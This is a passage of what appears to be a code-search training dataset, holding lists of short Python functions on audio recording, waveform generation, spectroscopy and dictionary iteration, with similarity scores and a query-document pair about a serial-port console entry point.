"def next_wave(self):\n if self._wave == self._level.get_max_wave():\n return\n\n self._wave += 1\n\n #Task 1.3 (Status Bar): Update the current wave display here\n self._status_bar.set_wave(self._wave)\n\n #Task 1.5 (Play Controls): Disable the add wave button here (if this is the last wave)\n if self._wave == 20:\n self._wave_button.config(state=tk.DISABLED)\n\n #Generate wave and enqueue\n wave = self._level.get_wave(self._wave, self._game)\n for step, enemy in wave:\n enemy.set_cell_size(self._game.grid.cell_size)\n\n self._game.queue_wave(wave)",
"def record():\n p = pyaudio.PyAudio()\n stream = p.open(format=FORMAT, channels=1, rate=RATE,\n input=True, output=True,\n frames_per_buffer=CHUNK_SIZE)\n\n num_silent = 0\n snd_started = False\n\n r = array('h')\n\n while 1:\n # little endian, signed short\n snd_data = array('h', stream.read(CHUNK_SIZE))\n if byteorder == 'big':\n snd_data.byteswap()\n r.extend(snd_data)\n\n silent = is_silent(snd_data)\n\n if silent and snd_started:\n num_silent += 1\n elif not silent and not snd_started:\n snd_started = True\n\n if snd_started and num_silent > SILENCE:\n break\n\n sample_width = p.get_sample_size(FORMAT)\n stream.stop_stream()\n stream.close()\n p.terminate()\n\n r = normalize(r)\n r = trim(r)\n r = add_silence(r, 0.5)\n return sample_width, r",
"def wavelength(self):\n return self.getparam(\"WAVELENGTH\")",
"def wavelength(self):\n return self.getparam(\"WAVELENGTH\")",
"def record_audio_to_file_and_get_wav(self, time, file_name):\n sample_width, frames = self.record_audio(time)\n wf = wave.open(file_name, 'wb')\n wf.setnchannels(self.channels)\n wf.setsampwidth(sample_width)\n wf.setframerate(self.rate)\n wf.writeframes(frames)\n wf.close()\n return WavFile(samples=frames, sample_width=sample_width, time=time, word=file_name)",
"def setwave(hdr):\n\n # Parse the header\n npix = hdr['NAXIS1']\n crpix1 = hdr['CRPIX1'] if 'CRPIX1' in hdr else 1.\n crval1 = hdr['CRVAL1']\n\n cdelt1, dc_flag = get_cdelt_dcflag(hdr)\n\n # Generate\n wave = crval1 + cdelt1 * (np.arange(npix) + 1. - crpix1)\n if dc_flag == 1:\n wave = 10.**wave # Log\n\n return wave",
"def getWaveform(self, filename, ch):\n if filename in self.sndfiles:\n return self.grid.getWaveform(self.sndfiles[filename], ch)",
"def get_waveform_info():\n dpo.write('acquire:stopafter sequence')\n dpo.write('acquire:state on')\n dpo.query('*OPC?')\n binaryFormat = dpo.query('wfmoutpre:bn_fmt?').rstrip()\n print('Binary format: ', binaryFormat)\n numBytes = dpo.query('wfmoutpre:byt_nr?').rstrip()\n print('Number of Bytes: ', numBytes)\n byteOrder = dpo.query('wfmoutpre:byt_or?').rstrip()\n print('Byte order: ', byteOrder)\n encoding = dpo.query('data:encdg?').rstrip()\n print('Encoding: ', encoding)\n if 'RIB' in encoding or 'FAS' in encoding:\n dType = 'b'\n bigEndian = True\n elif encoding.startswith('RPB'):\n dType = 'B'\n bigEndian = True\n elif encoding.startswith('SRI'):\n dType = 'b'\n bigEndian = False\n elif encoding.startswith('SRP'):\n dType = 'B'\n bigEndian = False\n elif encoding.startswith('FP'):\n dType = 'f'\n bigEndian = True\n elif encoding.startswith('SFP'):\n dType = 'f'\n bigEndian = False\n elif encoding.startswith('ASCI'):\n raise visa.InvalidBinaryFormat('ASCII Formatting.')\n else:\n raise visa.InvalidBinaryFormat\n return dType, bigEndian",
"def wave_create():\n return _u2i(_pigpio_command(_control, _PI_CMD_WVCRE, 0, 0))",
"def wavPlayer(data, rate, scale=False, autoplay=False):\r\n #if np.max(abs(data)) > 1 or scale:\r\n # data = data/np.max(abs(data))\r\n #data = (2**13*data).astype(np.int16)\r\n \r\n buffer = BytesIO()\r\n buffer.write(b'RIFF')\r\n buffer.write(b'\\x00\\x00\\x00\\x00')\r\n buffer.write(b'WAVE')\r\n \r\n buffer.write(b'fmt ')\r\n if data.ndim == 1:\r\n noc = 1\r\n else:\r\n noc = data.shape[1]\r\n \r\n bits = data.dtype.itemsize * 8\r\n sbytes = rate*(bits // 8)*noc\r\n ba = noc * (bits // 8)\r\n buffer.write(struct.pack('<ihHIIHH', 16, 1, noc, rate, sbytes, ba, bits))\r\n\r\n # data chunk\r\n buffer.write(b'data')\r\n buffer.write(struct.pack('<i', data.nbytes))\r\n\r\n if data.dtype.byteorder == '>' or (data.dtype.byteorder == '=' and sys.byteorder == 'big'):\r\n data = data.byteswap()\r\n\r\n buffer.write(data.astype(np.int16).tostring())\r\n\r\n # Determine file size and place it in correct position at start of the file.\r\n size = buffer.tell()\r\n buffer.seek(4)\r\n buffer.write(struct.pack('<i', size-8))\r\n \r\n val = buffer.getvalue()\r\n autoplay = \" autoplay=\\\"autoplay\\\"\"*autoplay + \"\"\r\n \r\n src = \"\"\"<audio controls=\"controls\" style=\"width:600px\"{autoplay}>\r\n <source controls src=\"data:audio/wav;base64,{base64}\" type=\"audio/wav\" />\r\n Your browser does not support the audio element.\r\n </audio>\"\"\".format(base64=base64.b64encode(val).decode(\"ascii\"), autoplay=autoplay)\r\n display(HTML(src))",
"def get_cw_freq(self):\n return self.get_frequency(self.synth)",
"def wave(pi, gpio, hz, secs, on=1, offset=0):\n micros_left = int(secs * 1000000)\n transitions = int(2 * hz * secs)\n micros = micros_left / transitions\n\n if (offset < 0) or (offset > micros):\n print(\"Illegal offset {} for hz {}\".format(offset, hz))\n exit()\n\n pi.set_mode(gpio, pigpio.OUTPUT)\n\n wf = [] # Empty waveform.\n\n if offset:\n wf.append(pigpio.pulse(0, 0, offset))\n micros_left -= micros\n last_micros = micros - offset\n transitions -= 1\n\n for t in range(transitions, 0, -1):\n micros = micros_left / t\n if (t & 1) == (on & 1):\n wf.append(pigpio.pulse(0, 1<<gpio, micros))\n else:\n wf.append(pigpio.pulse(1<<gpio, 0, micros))\n micros_left -= micros\n\n if offset:\n if on:\n wf.append(pigpio.pulse(1<<gpio, 0, last_micros))\n else:\n wf.append(pigpio.pulse(0, 1<<gpio, last_micros))\n\n pi.wave_add_generic(wf)\n pi.wave_send_repeat(pi.wave_create())",
"def getWaveSample( self, position ):\n\t\td = self.data[position]\n\t\treturn d",
"def get_sound(self, path):\n\n # Get sound node\n paths = path.split('/')\n sound_path = f'{paths[0]}.img/{paths[1]}'\n sound_node = self.file.resolve(sound_path)\n if not sound_node:\n return None\n\n # Get sound data\n sound = sound_node.get_sound()\n data = io.BytesIO(sound[82:])\n\n # header = sound[32:82]\n # fmt = int.from_bytes(header[8:12], 'big')\n # channels = int.from_bytes(header[22:24], 'little')\n # sample_rate = int.from_bytes(header[24:28], 'little')\n # byte_rate = int.from_bytes(header[28:32], 'little')\n # block_align = int.from_bytes(header[32:34], 'little')\n # bits_per_sample = int.from_bytes(header[34:36], 'little')\n\n # Convert to wav\n audio_bytes = io.BytesIO()\n audio = AudioSegment.from_file(data)\n audio.export(audio_bytes,\n format='wav',\n codec='pcm_s16le',\n parameters=['-ar', '44100'])\n return audio_bytes.getbuffer()",
"def get_combLine(self):\r\n # print '*********in get comline'\r\n self.get_frequency()\r\n ## Wavemeter measurements\r\n #########################\r\n f_wavem_ = []\r\n #averages 20 wavemeter readings\r\n for nn in range(20): \r\n self.meter.set_lambda_units('GHz') # set measurement unit ('nm', 'GHz' or 'cm')\r\n lam = self.meter.get_lambda() # gets the current Wavelength\r\n if lam > 1:\r\n f_wavem_.append(lam*1e9)\r\n f_wavem_avg = numpy.mean(f_wavem_)\r\n f_wavem = round(f_wavem_avg,0)\r\n ## calculation of locking mode number\r\n #####################################\r\n n = (f_wavem-self.sign_lock*self.f_lock-self.sign_0*self.f_0)/self.f_rep\r\n self.n = round(n,0)\r\n self.get_synth_tolerance()\r\n \r\n # print 'f_0 = %.0f Hz'%self.f_0\r\n # print 'f_rep = %.0f Hz'%self.f_rep\r\n # print 'f_wavem = %.0f Hz'%f_wavem\r\n # print 'f_lock = %.0f Hz'%self.f_lock\r\n # print 'n = %.2f'%n\r",
"def get_spectral_response(wavelengths_arr, stack):\n\n resolution = 1\n for i, re_index in enumerate(stack.index):\n step_size = stack.thickness.sum() / 2 ** 17\n z0 = np.linspace(0, stack.thickness[i], round(stack.thickness[i] / step_size))\n resolution += len(z0)\n\n electric_tot_te = np.zeros([resolution, len(wavelengths_arr)], dtype=complex)\n electric_tot_tm = np.zeros([resolution, len(wavelengths_arr)], dtype=complex)\n reflectivity_te = np.zeros(len(wavelengths_arr), dtype=complex)\n reflectivity_tm = np.zeros(len(wavelengths_arr), dtype=complex)\n transmission_te = np.zeros(len(wavelengths_arr), dtype=complex)\n transmission_tm = np.zeros(len(wavelengths_arr), dtype=complex)\n index_tot = np.zeros([resolution, len(wavelengths_arr)], dtype=complex)\n theta_tot = np.zeros([len(stack.index) + 1, wavelengths_arr.size], dtype=complex)\n\n a0 = 1 # Initial amplitude of electric field going toward the coating\n b0 = 0 # Initial amplitude of electric field going back the coating (if 0, no counter propagating light)\n theta = 0 # angle of the beam with respect to the coating\n\n for i, lam in enumerate(wavelengths_arr):\n # print a progressbar in the console\n print_progressbar(i, len(wavelengths_arr), suffix = '%')\n electric_tot_te[:, i], electric_tot_tm[:, i], reflectivity_te[i], reflectivity_tm[i], transmission_te[i], \\\n transmission_tm[i], index_tot, L, theta_tot = transfer_matrix_method(stack, a0, b0, lam, theta)\n return reflectivity_te, transmission_te, 1 - (reflectivity_te + transmission_te)",
"def fingerprint_wave(file):\n\n\twav = wave.open(file, 'rb')\n\tif wav.getnchannels() == 1:\n\t\tstereo = 0\n\telif wav.getnchannels() == 2:\n\t\tstereo = 1\n\telse:\n\t\twav.close()\n\t\traise Exception(\"Only 1 or 2 channel WAV files supported\")\n\n\twidth = wav.getsampwidth()\n\tif width != 2:\n\t\twav.close()\n\t\traise Exception(\"Only 16-bit sample widths supported\")\n\n\tsrate = wav.getframerate()\t\n\n\tbuffer = wav.readframes(wav.getnframes())\n\twav.close()\n\n\tms = (len(buffer) / 2)/(srate/1000)\n\tif stereo == 1:\n\t\tms = ms / 2\n\t\n\tfprint = libofa.create_print(buffer, libofa.BYTE_ORDER_LE, len(buffer) / 2,\n\t\t\t\t\t\t\t\tsrate, stereo);\n\n\treturn (fprint, ms)",
"def pattern(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"pattern\")",
"def pattern(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"pattern\")",
"def get_mask_wave(self, i_order):\n\n attrs = ['wave_p', 'wave_m', 'i_bounds']\n wave_p, wave_m, i_bnds = self.get_attributes(*attrs, i_order=i_order)\n wave_min = self.wave_grid[i_bnds[0]]\n wave_max = self.wave_grid[i_bnds[1] - 1]\n\n mask = (wave_m < wave_min) | (wave_p > wave_max)\n\n return mask",
"def _getWavelet(self, ch='dos1rate', thresh=0.1, maxWidth=1, SIGNIF_LEVEL=0.25):\n # Feed the counts into the wavelet microburst finder\n validDataIdt = np.where(self.d[ch] != -1E31)[0]\n waveletAnalysis.WaveletDetector.__init__(self, self.d[ch][validDataIdt], \n self.d['dateTime'][validDataIdt], 0.1, mother='DOG', siglvl=0.95)\n self.waveletTransform() # Get wavelet space\n self.waveletFilter(self.s0, maxWidth, SIGNIF_LEVEL=SIGNIF_LEVEL) # Do a band pass and significance filter.\n self.degenerateInvWaveletTransform() # Inverse transform filtered data.\n # Indicies where the error-filetered data is greater than thresh\n self.burstIdt = np.where(self.dataFlt > thresh)[0] \n self._getPeaks(ch, validDataIdt) # Find peaks\n return",
"def Get_DataRateAndBandwidth(self):\r\n current = self.__readFromRegister(self.__REG_RW_CTRL_REG1, self.__MASK_CTRL_REG1_DR | self.__MASK_CTRL_REG1_BW)\r\n for dr in self.__DRBW.keys():\r\n for bw in self.__DRBW[dr].keys():\r\n if self.__DRBW[dr][bw] == current:\r\n return (dr, bw)",
"def getPulseWave(ham: Dict[str, Any], names: Union[str, List[str]]) -> Dict[str, Any]:\n if isinstance(names, str):\n return ham[\"control\"][names][\"waveforms\"]\n else:\n waves = {}\n for name in names:\n wave = ham[\"control\"][names][\"waveforms\"]\n waves[name] = wave\n return waves",
"def get_spectral(period, stream, damping, rotation=None):\n T = period\n freq = 1.0 / T\n omega = (2 * 3.14159 * freq) ** 2\n paz_sa = corn_freq_2_paz(freq, damp=damping)\n paz_sa['sensitivity'] = omega\n paz_sa['zeros'] = []\n spect_stream = Stream()\n\n horizontals = []\n for idx, trace in enumerate(stream):\n # Group all of the max values from traces without\n # Z in the channel name\n if 'Z' not in trace.stats['channel'].upper():\n horizontals += [trace.copy()]\n h1_stats = horizontals[0].stats\n\n if rotation is None:\n for trace in stream:\n samp_rate = trace.stats['sampling_rate']\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n dd = simulate_seismometer(trace.data, samp_rate,\n paz_remove=None,\n paz_simulate=paz_sa,\n taper=True,\n simulate_sensitivity=True,\n taper_fraction=0.05)\n period_str = 'T' + '{:04.2f}'.format(T)\n stats_out = trace.stats.copy()\n stats_out['period'] = period_str\n spect_trace = Trace(dd, stats_out)\n spect_trace.data = spect_trace.data * GAL_TO_PCTG\n spect_trace.stats['units'] = '%%g'\n spect_stream.append(spect_trace)\n return spect_stream\n elif rotation.lower() == 'nongm':\n if len(horizontals) != 2:\n warnings.warn('Spectral amplitude rotation could not be performed.')\n return\n rot = [rotate(horizontals[0], horizontals[1], combine=True)]\n elif rotation.lower() == 'gm':\n if len(horizontals) != 2:\n warnings.warn('Spectral amplitude rotation could not be performed.')\n return\n rot1, rot2 = rotate(horizontals[0], horizontals[1], combine=False)\n rot = [rot1, rot2]\n rotated = []\n for rot_matrix in rot:\n rotated_spectrals = np.zeros(rot_matrix.shape)\n for idx, row in enumerate(rot_matrix):\n samp_rate = h1_stats['sampling_rate']\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n dd = simulate_seismometer(row, samp_rate,\n paz_remove=None,\n paz_simulate=paz_sa,\n taper=True,\n simulate_sensitivity=True,\n taper_fraction=0.05)\n\n period_str = 'T' + '{:04.2f}'.format(T)\n stats_out = h1_stats.copy()\n stats_out['period'] = period_str\n spect_trace = Trace(dd, stats_out)\n spect_trace.data = spect_trace.data * GAL_TO_PCTG\n spect_trace.stats['units'] = '%%g'\n rotated_spectrals[idx] = spect_trace\n rotated += [rotated_spectrals]\n return rotated",
"def wave_tx_start():\n return _u2i(_pigpio_command(_control, _PI_CMD_WVGO, 0, 0))",
"def get_recorded_audio(self):\n return self.frames",
"def pattern(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"pattern\")",
"def get_spectrum(self):\n\n self.sock.send('Q')\n self.sock.send(str(100 * self.center_wl))\n\n response = self.sock.recv(7)\n if not response:\n raise InstrumentError(\n 'No response from Labview client, try reconnecting')\n\n datalen = int(response)\n data = ''\n\n while datalen > 0:\n # read data in chunks\n dt = self.sock.recv(datalen)\n data += dt\n datalen -= len(dt)\n\n data = data.split(\"\\n\")[:-1]\n for i in range(len(data)):\n data[i] = data[i].split(\"\\t\")\n\n data = n.array(data,dtype=float)\n\n wl = data[0]\n ccd = data[1:]\n\n return wl,ccd\n\n #self.sock.close()",
"def spect(self):\n return 1",
"def get_pattern(N, d, wavelength, phi, amplitude_law, minimum_amplitude, logScale=True):\r\n # Compute phase and amplitudes laws\r\n amp_law = get_amplitude_law(N, amplitude_law, minimum_amplitude)\r\n phase_law = get_phase_law(N, d, wavelength, phi)\r\n \r\n theta = np.arange(-np.pi/2, np.pi/2, np.radians(0.1))\r\n mag = []\r\n for theta_i in theta:\r\n im = re = 0\r\n # Phase shift due to off-boresight angle\r\n psi = 2 * np.pi * d / wavelength * np.sin(theta_i)\r\n # Compute sum of effects of elements\r\n for n in range(N):\r\n im += amp_law[n] * np.sin(n*psi + phase_law[n])\r\n re += amp_law[n] * np.cos(n*psi + phase_law[n])\r\n magnitude = np.sqrt(re**2 + im**2)/N\r\n if logScale:\r\n magnitude = 20*np.log10(magnitude)\r\n mag.append(magnitude)\r\n \r\n return theta, mag, amp_law, phase_law",
"def _get_spectrograms(self, index):\n file = self._waves[index]\n\n # get hyper-parameters\n hp = self.hparams\n\n w, _ = lr.load(file, sr=hp.sr)\n w, _ = lr.effects.trim(w) # triming\n\n linear = audio.wave2spec(w, hp)\n\n return linear, w",
"def readWaveformNames(self):\n self.sendMessage('WLIST:SIZE?')\n ansr=self.readMessage()\n msg=[]\n for i in xrange (1,int(ansr)+1):\n msg.append('WLIST:NAME? '+str(i))\n self.sendMessage(msg)\n wnames = self.readMessage()\n names=re.findall('\".*?\"',wnames)\n strippednames=[]\n for name in names:\n strippednames.append(name.rstrip('\"').lstrip('\"'))\n return strippednames",
"def GetWavelengths (self) :\n\t\treturn self.run(\"GetWavelengths\")",
"def colorlaw(self, wave=None):\n if wave is None:\n wave = self._wave\n else:\n wave = np.asarray(wave)\n if wave.ndim == 0: \n return self._colorlaw(np.ravel(wave))[0]\n else:\n return self._colorlaw(wave)",
"def rmsilence(sample):\n ns, ne = sample.wordseq[0][0][0], sample.wordseq[-1][0][1]\n return sample.signal[ns:ne]",
"def get_weights(mc_par, spectral_par):\n r = rate(\"PowerLaw\",\n mc_par['emin'], mc_par['emax'],\n spectral_par, mc_par['cone'], mc_par['area_sim'])\n\n w = weight(\"PowerLaw\",\n mc_par['emin'], mc_par['emax'],\n mc_par['sp_idx'], r,\n mc_par['sim_ev'], spectral_par)\n return w",
"def record(self):\n\n while True:\n frames = []\n self.stream.start_stream()\n for i in range(self.num_frames):\n data = self.stream.read(FRAMES_PER_BUFFER)\n frames.append(data)\n self.output.seek(0)\n w = wave.open(self.output, 'wb')\n w.setnchannels(CHANNELS)\n w.setsampwidth(self.audio.get_sample_size(FORMAT))\n w.setframerate(RATE)\n w.writeframes(b''.join(frames))\n w.close()\n yield",
"def _record_wav(stream, N, CHUNK):\n frames = []\n for i in range(N):\n data = stream.read(CHUNK)\n frames.append(data)\n return np.fromstring(b\"\".join(frames), 'Int16')"
] | [
"0.5981788",
"0.5724615",
"0.56906223",
"0.5673661",
"0.56648856",
"0.544376",
"0.54234815",
"0.5388818",
"0.5373861",
"0.53209776",
"0.53193724",
"0.5285998",
"0.52687967",
"0.5267398",
"0.51937246",
"0.5191461",
"0.5150314",
"0.5148032",
"0.51321924",
"0.5121972",
"0.5121972",
"0.51162314",
"0.5113482",
"0.51080644",
"0.5107305",
"0.50997585",
"0.50965",
"0.5076782",
"0.50737554",
"0.5073261",
"0.50691676",
"0.50579846",
"0.5049537",
"0.50489765",
"0.5040555",
"0.50231206",
"0.50231206",
"0.50231206",
"0.5015919",
"0.50052613",
"0.5002976",
"0.49937323",
"0.49865744",
"0.4965181",
"0.4965181",
"0.49512777",
"0.49485463",
"0.49463305",
"0.49443266",
"0.4938828",
"0.49355376",
"0.48933876",
"0.48908025",
"0.4887688",
"0.48723918",
"0.4863659",
"0.4851648",
"0.48452222",
"0.48425525",
"0.48398793",
"0.48339698",
"0.48331252",
"0.48308372",
"0.48284227",
"0.48147464",
"0.48147464",
"0.48087412",
"0.48070666",
"0.48069268",
"0.48068205",
"0.479937",
"0.47918564",
"0.47765115",
"0.47729513",
"0.47589156",
"0.47513583",
"0.47452554",
"0.47406584",
"0.4738934",
"0.47370613",
"0.47370613",
"0.47217062",
"0.47187388",
"0.47162774",
"0.47155774",
"0.47066417",
"0.46997574",
"0.4699366",
"0.46991035",
"0.4693562",
"0.46883234",
"0.46880096",
"0.46830177",
"0.46823943",
"0.46752512",
"0.46729076",
"0.4668943",
"0.4662293",
"0.4660086",
"0.46584556"
] | 0.7454566 | 0 |
This is the main entry for the console. | def main():
bp = Bin_API('COM10')
print('Testing')
bp.set_hwtrig_term(1) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def console_entry():\n #main()",
"def main():\n return",
"def main() -> None:\n return",
"def main() -> None:",
"def main() -> None:",
"def main() -> None:",
"def main() -> None:",
"def main():\n pass",
"def main():\n\tcli = Cli()\n\tcli.run()",
"def main(args=None):",
"def main(args=None):",
"def main(self) -> None:\n pass",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():\n\tpass",
"def main(args=None):\n pass",
"def main():\n Main()",
"def main():\n CLI_APP.run()",
"def main():\r\n print(\"JoJo\")",
"def main(args):",
"def main(args):",
"def main():\n\n pass",
"def main_cli():\n pass",
"def main():\n print(\"Call your main application code here\")",
"def main():\n print(\"Call your main application code here\")",
"def main():\n print(\"Call your main application code here\")",
"def main():\n ...",
"def main():\n print(\"is Running!\")",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main(ctx, verbose):\n return",
"def cli():\n pass",
"def cli():\r\n pass",
"def main(argv: Sequence[Text]) -> None:\n\n\n print(\"TODO\")",
"def main():\n pass",
"def cli():\n\n pass",
"def main(self):\r\n pass",
"def cli():",
"def cli():",
"def cli():",
"def cli():",
"def cli():",
"def cli():",
"def cli():",
"def cli():",
"def cli():",
"def cli():",
"def cli():",
"def cli():",
"def cli():",
"def cli():",
"def cli():",
"def cli():",
"def cli():",
"def cli():",
"def cli():",
"def cli():",
"def cli():",
"def cli():"
] | [
"0.8272837",
"0.79682225",
"0.7880587",
"0.77964354",
"0.77964354",
"0.77964354",
"0.77964354",
"0.7750121",
"0.7633499",
"0.7600834",
"0.7600834",
"0.7592275",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75211954",
"0.75097",
"0.7507609",
"0.7502285",
"0.7494331",
"0.7470814",
"0.7470814",
"0.74697",
"0.7467304",
"0.7461932",
"0.7461932",
"0.7461932",
"0.7459916",
"0.74566126",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7358481",
"0.73094827",
"0.73031455",
"0.7285269",
"0.7276882",
"0.72503686",
"0.7216856",
"0.720302",
"0.720302",
"0.720302",
"0.720302",
"0.720302",
"0.720302",
"0.720302",
"0.720302",
"0.720302",
"0.720302",
"0.720302",
"0.720302",
"0.720302",
"0.720302",
"0.720302",
"0.720302",
"0.720302",
"0.720302",
"0.720302",
"0.720302",
"0.720302",
"0.720302"
] | 0.0 | -1 |
If we don't define this, it will use the regular dictionary __iter__ which does not call SortedDictionary.keys(). | def __iter__(self):
for each in list(self.keys()):
yield each | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def __iter__(self):\n return self.ordered_keys.__iter__()",
"def __iter__(self):\n return iter(self.keys())",
"def __iter__(self):\n if self._len_keys == 1:\n yield from self._dict.keys()\n else:\n for key in self._dict.keys():\n yield tuple(sorted(list(key)))",
"def __iter__(self):\n for x in sorted(self.keys()):\n yield self[x]",
"def __iter__(self):\n for key in sorted(self.keys):\n yield key, self[key]",
"def __iter__(self):\n # Return an iterator for the keys in the underlying dictionary.\n return iter(self.data)",
"def __iter__(self) -> iter:\n return iter(self._dict)",
"def iterkeys(self):\n return DictKeysIterator(self)",
"def __iter__(self):\n return iter(self._key_order)",
"def __iter__(self):\n\t\treturn self.keys()",
"def __iter__(self):\n return self.keys()",
"def iterkeys(self):",
"def iterkeys(self):",
"def iterkeys(self):\n return self.__iter__()",
"def __iter__(self):\n\n return iter([key for key in self._data.keys()])",
"def _map___iter__(self):\n return self.iterkeys()",
"def __iter__(self) -> Generator:\n for k in self.raw.keys():\n yield k",
"def __iter__(self) -> Iterator[str]:\n return iter(self._keys)",
"def __iter__(self):\n\t\tfor key, value in self.__dict__.iteritems():\n\t\t\tif key[0] != '_':\n\t\t\t\tyield value",
"def iterkeys(d):\r\n return iter(getattr(d, _iterkeys)())",
"def __iter__(self, *args, **kwargs):\n for key in self.keys(*args, **kwargs):\n yield key",
"def __iter__(self):\n return iter({})",
"def __iter__(self):\n\n return self._entries.__iter__()",
"def __iter__(self):\n return iter(self._internals.values())",
"def __iter__(self):\n for domain in self.keys():\n yield domain",
"def iterkeys(d):\n return iter(getattr(d, _iterkeys)())",
"def __iter__(self):\n return self._data_dict.__iter__()",
"def __iter__(self):\n return iter(self.items)",
"def __iter__(self):\n return iter(self.items)",
"def __iter__(self):\n for value in self.__dict__.values():\n yield value",
"def iteritems(self):\n return DictItemsIterator(self)",
"def __iter__(self):\n cursor=0\n while cursor<len(self):\n yield self._item[cursor].key\n cursor+=1",
"def iterator(self):\n return self.KeyIterator()",
"def __iter__(self):\n alt_locs = self.keys()\n alt_locs.sort()\n for alt_loc in alt_locs:\n yield self[alt_loc]",
"def __iter__(self):\n\n # For each key in set of keys\n for key in self.keys_set:\n\n # Yield that key and associated value\n yield key, self.__getitem__(key)",
"def __iter__(self):\r\n return iter(self._items)",
"def __iter__(self):\r\n return iter(self._items)",
"def __iter__(self):\n for bucket in self._table:\n if bucket is not None:\n for key in bucket:\n yield key",
"def iteritems(self):\n def make_iter(self=self):\n keys = self.iterkeys()\n while True:\n key = keys.next()\n yield (key, self[key])\n return make_iter()",
"def __iter__(self):\n for acronym in self.keys:\n yield acronym, self.dict[acronym]",
"def iteritems(self):",
"def __iter__(self):\n yield from self._type_keys",
"def iterkeys(self, *args, **kwargs):\n self.__iter__(*args, **kwargs)",
"def __iter__(self):\n for v in self._items:\n yield v",
"def __init__(self):\n super(KeyIterator, self).__init__()\n self.iterator = self.ValueIterator()",
"def __iter__(self):\r\n for item in self._data:\r\n yield item # yield the KEY\r",
"def __iter__(self):\n return iter(self._items)",
"def __iter__(self):\n return iter(self._items)",
"def __iter__(self):\n return iter(self._d)",
"def __iter__(self):\n return self.in_order",
"def __iter__():",
"def __iter__():",
"def __iter__():",
"def __iter__():",
"def iteritems(self):\n for key in self:\n yield key, self[key]",
"def iteritems(self):\n for key in self:\n yield (key, self[key])",
"def __iter__(self):\n for key in sorted(self._points):\n yield key",
"def iterentries(self):\n for key in self.iterkeys():\n yield self.get(key)",
"def iterkeys(self):\r\n for wr in self.data.iterkeys():\r\n obj = wr()\r\n if obj is not None:\r\n yield obj",
"def iterkeys(self):\r\n for wr in self.data.iterkeys():\r\n obj = wr()\r\n if obj is not None:\r\n yield obj",
"def iterkeys(self):\n if PY2:\n return self._tagged.iterkeys()\n else:\n return self._tagged.keys()",
"def __iter__(self):\n for value in dict.__iter__(self):\n for count in range(self[value]):\n yield value",
"def __iter__ (self):\n return iter (self.containments.keys ())",
"def iterkeys(self):\n return iter(self._sequence)",
"def __iter__(self): # pragma: no cover\r\n return ((k, v) for k, v in vars(self).items() if not k.startswith(\"_\"))",
"def __iter__(self):\n yield from chain.from_iterable(self.data.values())",
"def __iter__(self):\n return iter(self.vert_dict.values())",
"def __iter__(self):\n return iterkeys(self._ngrams)",
"def __iter__( self ) :\n\n for entry in self.__entries : yield entry",
"def __iter__(self):\n with SessionContext(self.SessionClass) as session:\n keys = session.query(PAW2_DBObject.key)\n keys = [c[0] for c in keys]\n random.shuffle(keys)\n return keys.__iter__()",
"def __iter__(self):\n return iter(self.__iter())",
"def __iter__(self):\n \n return iter(self.vert_dict.values())",
"def iterkeys(d, **kw):\r\n return iter(getattr(d, _iterkeys)(**kw))",
"def iterkeys(d, **kw):\r\n return iter(getattr(d, _iterkeys)(**kw))",
"def __iter__(self) -> 'Dictionary':\n return copy.deepcopy(self)",
"def __iter__(self):\n pass",
"def __iter__(self):\n pass",
"def __iter__(self):\n pass",
"def __iter__(self):\n pass",
"def __iter__(self):\n pass",
"def __iter__(self):\n pass",
"def __iter__(self):\n pass",
"def __iter__(self):\n # This could be as simple as \"return self._getKeyList().__iter__()\"\n # but this performs some extra consistency checking to make sure the\n # key we iterate to actually exists, to keep us from crashing if\n # our db is a little out of sync with itself.\n\n # This is a nasty hack because our db seems prone to circular links\n nItems = 0\n for item in self._getKeyList():\n if item in self:\n yield item\n nItems += 1\n # NASTY HACK!\n if nItems > 1000:\n self.reindex()\n raise Exception(\"Circular link corrected, try again\")\n else:\n self._delKey(item)",
"def Keys(self) -> NameObjectCollectionBase.KeysCollection:",
"def __iter__(self):\n self._deduplicate()\n return iter(self._entries)",
"def __iter__(cls):\n return iter(cls.__by_number.values())",
"def iteritems(self):\r\n return six.iteritems(self._as_dict())",
"def keys(self):\n return iter(k for k, _ in self._pairs())",
"def __iter__(self):\n\n result = []\n\n # d - dict, p - path (keys sequence)\n def recurs_iter(d, p=None):\n p = p or []\n\n # k - key, v - value\n for k, v in iteritems(d):\n next_p = p + [k]\n if isinstance(v, dict):\n recurs_iter(v, next_p)\n else:\n result.append(tuple(next_p))\n\n recurs_iter(self.__dict__)\n\n return iter(result)",
"def keys(self):\n raise NotImplementedError('keys() should have been replaced by a metaclass')",
